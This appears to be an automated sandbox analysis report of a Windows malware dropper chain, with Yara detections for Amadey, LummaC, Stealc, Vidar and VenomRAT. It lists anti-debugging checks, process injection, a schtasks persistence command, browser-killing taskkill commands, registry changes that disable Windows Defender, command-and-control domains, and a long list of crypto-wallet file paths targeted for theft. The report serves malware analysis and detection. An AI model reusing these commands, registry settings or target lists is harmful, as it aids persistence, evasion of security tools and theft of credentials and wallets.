Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	File opened: SIWVID

Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe

System information queried: KernelDebuggerInformation

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_053E06F3 rdtsc

0_2_053E06F3

Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe

Code function: 14_2_6D445FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,

14_2_6D445FF0

Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe

14_2_6D3F9590

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006E652B mov eax, dword ptr fs:[00000030h]	0_2_006E652B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EA302 mov eax, dword ptr fs:[00000030h]	0_2_006EA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00B1A302 mov eax, dword ptr fs:[00000030h]	1_2_00B1A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00B1652B mov eax, dword ptr fs:[00000030h]	1_2_00B1652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00B1A302 mov eax, dword ptr fs:[00000030h]	2_2_00B1A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00B1652B mov eax, dword ptr fs:[00000030h]	2_2_00B1652B

Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D41B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_6D41B66C
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D41B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_6D41B1F7
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D5CAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_6D5CAC62

Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: 232a1df2aa.exe PID: 3300, type: MEMORYSTR

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1015357001\ee19225489.exe

Memory written: C:\Users\user\AppData\Local\Temp\1015357001\ee19225489.exe base: 400000 value starts with: 4D5A

LummaC encrypted strings found

Source: H9TU4oY.exe	String found in binary or memory: diffuculttan.xyz
Source: H9TU4oY.exe	String found in binary or memory: debonairnukk.xyz
Source: H9TU4oY.exe	String found in binary or memory: deafeninggeh.biz
Source: H9TU4oY.exe	String found in binary or memory: effecterectz.xyz
Source: H9TU4oY.exe	String found in binary or memory: shineugler.biz
Source: H9TU4oY.exe	String found in binary or memory: immureprech.biz
Source: c1ca3b12e5.exe	String found in binary or memory: tacitglibbr.biz

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe "C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe "C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe "C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe "C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe "C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe "C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015356001\eb9e6e120f.exe "C:\Users\user\AppData\Local\Temp\1015356001\eb9e6e120f.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015357001\ee19225489.exe "C:\Users\user\AppData\Local\Temp\1015357001\ee19225489.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "chromes" /tr '"C:\Users\user\AppData\Roaming\chromes.exe"' & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "chromes" /tr '"C:\Users\user\AppData\Roaming\chromes.exe"'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 65,10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1015357001\ee19225489.exe	Process created: C:\Users\user\AppData\Local\Temp\1015357001\ee19225489.exe "C:\Users\user\AppData\Local\Temp\1015357001\ee19225489.exe"
Source: C:\Users\user\AppData\Local\Temp\1015357001\ee19225489.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T

Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe

Code function: 14_2_6D614760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

14_2_6D614760

Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe

Code function: 14_2_6D4F1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,

14_2_6D4F1C30

Source: 855be7cecf.exe, 00000010.00000000.2771678903.0000000000152000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: c1ca3b12e5.exe, c1ca3b12e5.exe, 0000000D.00000002.2787417950.0000000000EC2000.00000040.00000001.01000000.0000000C.sdmp, c1ca3b12e5.exe, 0000000F.00000002.2939879174.0000000000EC2000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Program Manager
Source: file.exe, 00000000.00000002.1770422110.00000000008F3000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1800972349.0000000000D23000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1805459158.0000000000D23000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Program Manager
Source: 232a1df2aa.exe, 232a1df2aa.exe, 0000000E.00000002.3197547067.0000000000F48000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: K58Program Manager

Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe

Code function: 14_2_6D41B341 cpuid

14_2_6D41B341

Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015356001\eb9e6e120f.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015356001\eb9e6e120f.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015357001\ee19225489.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015357001\ee19225489.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015358001\fa0a147006.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015358001\fa0a147006.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015359001\17bab35f4b.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015359001\17bab35f4b.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_006CCBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

0_2_006CCBEA

Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe

Code function: 14_2_6D518390 NSS_GetVersion,

14_2_6D518390

Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected VenomRAT

Source: Yara match	File source: 00000009.00000003.2548466156.00000000050F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ZiYbk6W.exe PID: 3992, type: MEMORYSTR

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	Registry value created: DisableNotifications 1

Disables Windows Defender Tamper protection

Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe

Registry value created: TamperProtection 0

Modifies windows update settings

Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations

Source: ZiYbk6W.exe, 00000009.00000003.2548466156.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: MSASCui.exe
Source: ZiYbk6W.exe, 00000009.00000003.2548466156.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: procexp.exe
Source: ZiYbk6W.exe, 00000009.00000003.2625612833.00000000077AF000.00000004.00000020.00020000.00000000.sdmp, ZiYbk6W.exe, 00000009.00000003.2891173830.0000000007796000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: ZiYbk6W.exe, 00000009.00000003.2548466156.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 0.2.file.exe.6b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.skotes.exe.ae0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.skotes.exe.ae0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000003.2324887817.0000000005260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1804750908.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1759596074.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1763794480.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1800363048.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1769780317.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1729574317.00000000051D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Credential Flusher

Source: Yara match

File source: Process Memory Space: 855be7cecf.exe PID: 2908, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 00000022.00000002.3250023944.000000000172B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.3244325269.0000000000B81000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3209276748.00000000018DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2710567698.0000000005430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2853865505.0000000005510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3193860810.0000000000B81000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 232a1df2aa.exe PID: 3300, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: 232a1df2aa.exe PID: 3300, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
